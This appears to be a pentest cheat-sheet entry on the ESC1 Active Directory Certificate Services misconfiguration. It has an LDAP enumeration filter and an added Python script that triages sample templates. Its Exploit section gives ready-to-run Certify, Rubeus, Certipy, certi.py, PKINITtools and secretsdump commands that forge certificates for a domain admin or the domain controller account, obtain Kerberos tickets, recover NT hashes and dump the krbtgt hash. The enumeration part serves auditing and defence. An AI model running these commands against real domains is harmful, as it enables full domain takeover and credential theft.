ESC1
Modifiable SAN + Smart Card Logon or Client Authentication or PKINIT Client Authentication EKUs
The vulnerable template lets the enrollee supply the subject and SAN in the CSR (msPKI-Certificate-Name-Flag has CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT set) and carries an EKU that Kerberos accepts for PKINIT: Smart Card Logon (1.3.6.1.4.1.311.20.2.2), Client Authentication (1.3.6.1.5.5.7.3.2) or PKINIT Client Authentication (1.3.6.1.5.2.3.4). For the abuse to work the template must also require no manager approval and no authorized signatures, and a low-privileged principal must hold Enroll rights on it (and an enterprise CA must publish it). A requester can then ask for a certificate whose SAN names any account, e.g. a domain admin, and authenticate to Kerberos as that account.

Enumerate

Find templates with this misconfiguration using the native Active Directory module. The filter checks enrollee-supplied subject (name flag bit 1), no manager approval (enrollment flag bit 2 not set), zero or absent authorized signatures and one of the three authentication EKUs; it does not check who holds Enroll rights on the template or which CA publishes it, so review the returned templates' ACLs and the CA's published template list afterwards:
PS > Get-ADObject -LDAPFilter '(&(objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(|(pkiextendedkeyusage=1.3.6.1.4.1.311.20.2.2)(pkiextendedkeyusage=1.3.6.1.5.5.7.3.2)(pkiextendedkeyusage=1.3.6.1.5.2.3.4))(mspki-certificate-name-flag:1.2.840.113556.1.4.804:=1))' -SearchBase 'CN=Configuration,DC=megacorp,DC=local'
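The same template check as an offline Python script, added here as an example (it is not the page's own code, nor Certipy's): it evaluates the flag bits and the EKU list of raw LDAP attribute values the way the filter above does, and additionally flags the Any Purpose EKU (2.5.29.37.0) and an empty EKU list, both of which Kerberos also accepts for PKINIT but the filter above does not match. The template objects are constructed sample data; in a real run they would be the attribute values returned by Get-ADObject or ldapsearch. Like the filter, it does not check Enroll rights.

```python
# Added example, not code from the original page: ESC1 triage of certificate
# templates from their raw LDAP attribute values. SAMPLE_TEMPLATES below is
# constructed data, not pulled from a real domain.

# Flag bits from MS-CRTD for msPKI-Certificate-Name-Flag / msPKI-Enrollment-Flag
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001  # requester sets subject/SAN in the CSR
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002          # manager approval required

# EKUs that make the issued certificate usable for Kerberos PKINIT
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2": "Client Authentication",
    "1.3.6.1.4.1.311.20.2.2": "Smart Card Logon",
    "1.3.6.1.5.2.3.4": "PKINIT Client Authentication",
    "2.5.29.37.0": "Any Purpose",
}


def _flag(template, attr):
    """AD returns these flags as signed 32-bit ints; normalise to unsigned."""
    return int(template.get(attr) or 0) & 0xFFFFFFFF


def auth_ekus(template):
    """Names of the authentication-capable EKUs on a template.
    An empty pkiExtendedKeyUsage means 'any purpose', which PKINIT also accepts."""
    ekus = template.get("pkiExtendedKeyUsage") or []
    if not ekus:
        return ["(no EKU: any purpose)"]
    return [AUTH_EKUS[oid] for oid in ekus if oid in AUTH_EKUS]


def is_esc1(template):
    """Same conditions as the LDAP filter: enrollee supplies the subject, no
    manager approval, no authorized signatures, and an authentication EKU."""
    supplies_subject = _flag(template, "msPKI-Certificate-Name-Flag") & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
    needs_approval = _flag(template, "msPKI-Enrollment-Flag") & CT_FLAG_PEND_ALL_REQUESTS
    ra_signatures = int(template.get("msPKI-RA-Signature") or 0)
    return bool(supplies_subject) and not needs_approval and ra_signatures == 0 and bool(auth_ekus(template))


def find_esc1(templates):
    """Map of template cn -> auth EKU names for every template matching ESC1."""
    return {t["cn"]: auth_ekus(t) for t in templates if is_esc1(t)}


# Constructed sample templates (attribute values as LDAP would hand them back)
SAMPLE_TEMPLATES = [
    {   # classic ESC1: enrollee-supplied subject + Client Authentication
        "cn": "VulnTemplate",
        "msPKI-Certificate-Name-Flag": 1,
        "msPKI-Enrollment-Flag": 0,
        "msPKI-RA-Signature": 0,
        "pkiExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2", "1.3.6.1.4.1.311.10.3.4"],
    },
    {   # same, but manager approval (PEND_ALL_REQUESTS) is on: not ESC1
        "cn": "ApprovedTemplate",
        "msPKI-Certificate-Name-Flag": 1,
        "msPKI-Enrollment-Flag": 0x2,
        "msPKI-RA-Signature": 0,
        "pkiExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
    },
    {   # built-in User template: SAN is built from AD (UPN/email required), not the CSR
        "cn": "User",
        "msPKI-Certificate-Name-Flag": -1509949440,  # 0xA6000000 as AD's signed int
        "msPKI-Enrollment-Flag": 41,
        "msPKI-RA-Signature": 0,
        "pkiExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2", "1.3.6.1.5.5.7.3.4", "1.3.6.1.4.1.311.10.3.4"],
    },
    {   # enrollee-supplied subject and no EKU at all: still good for PKINIT
        "cn": "NoEKUTemplate",
        "msPKI-Certificate-Name-Flag": 1,
        "msPKI-Enrollment-Flag": 0,
        "msPKI-RA-Signature": 0,
        "pkiExtendedKeyUsage": [],
    },
    {   # enrollee-supplied subject but one authorized signature required: not ESC1
        "cn": "SignedTemplate",
        "msPKI-Certificate-Name-Flag": 1,
        "msPKI-Enrollment-Flag": 0,
        "msPKI-RA-Signature": 1,
        "pkiExtendedKeyUsage": ["1.3.6.1.4.1.311.20.2.2"],
    },
]

if __name__ == "__main__":
    for cn, ekus in find_esc1(SAMPLE_TEMPLATES).items():
        print(f"[ESC1] {cn}: {', '.join(ekus)}")
```

Only VulnTemplate and NoEKUTemplate are reported; the built-in User template is excluded because bit 1 of its name flag is clear even though it carries Client Authentication, which is exactly the distinction the LDAP filter relies on.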

Exploit

Certify

Request a certificate specifying the /altname as a domain admin:
Cmd > .\Certify.exe request /ca:CA01.megacorp.local\CorpCA /template:VulnTemplate /altname:DomAdmin
Save the private key and certificate that Certify prints to cert.pem and convert them to a .pfx (the export password you choose here is the one passed to Rubeus below):
$ openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Request a TGT with the .pfx certificate:
Cmd > .\Rubeus.exe asktgt /domain:megacorp.local /dc:DC01.megacorp.local /user:DomAdmin /certificate:cert.pfx /password:Passw0rdPfx! /ptt

Certipy

Enroll a certificate with a privileged UPN in the SAN (this is the pre-4.0 Certipy syntax; Certipy 4.x takes -u/-p/-target and replaced -alt with -upn, plus -dns for machine names):
$ certipy req megacorp.local/snovvcrash:'Passw0rd!'@CA01.megacorp.local -ca CorpCA -template VulnTemplate -alt 'administrator@megacorp.local'
Request a TGT with the certificate; certipy auth also recovers the account's NT hash automatically:
$ certipy auth -pfx administrator.pfx -domain megacorp.local -username administrator -dc-ip 192.168.1.11

certi

Enroll a certificate with a privileged subject in the SAN, here the DC's machine account DC01$, which is allowed to replicate (DCSync):
$ certi.py req megacorp.local/snovvcrash@CA01.megacorp.local CorpCA -k -n --dc-ip 192.168.1.11 --template VulnTemplate --alt-name 'DC01$'
Request a TGT with the certificate via PKINIT (gettgtpkinit.py from PKINITtools); note the AS-REP encryption key it prints, it is needed in the next step:
$ base64 -w0 DC01.pfx > DC01.pfx.b64
$ python3 gettgtpkinit.py megacorp.local/'DC01$' -pfx-base64 $(cat DC01.pfx.b64) -pfx-pass admin -dc-ip 192.168.1.11 DC01.ccache
Recover the account's NT hash from the TGT with that key, or use the machine account's TGT to DCSync:
$ KRB5CCNAME=DC01.ccache python3 getnthash.py megacorp.local/'DC01$' -dc-ip 192.168.1.11 -key <AS_REP_ENC_KEY>
$ KRB5CCNAME=DC01.ccache secretsdump.py DC02.megacorp.local -dc-ip 192.168.1.11 -just-dc-user 'MEGACORP\krbtgt' -k -no-pass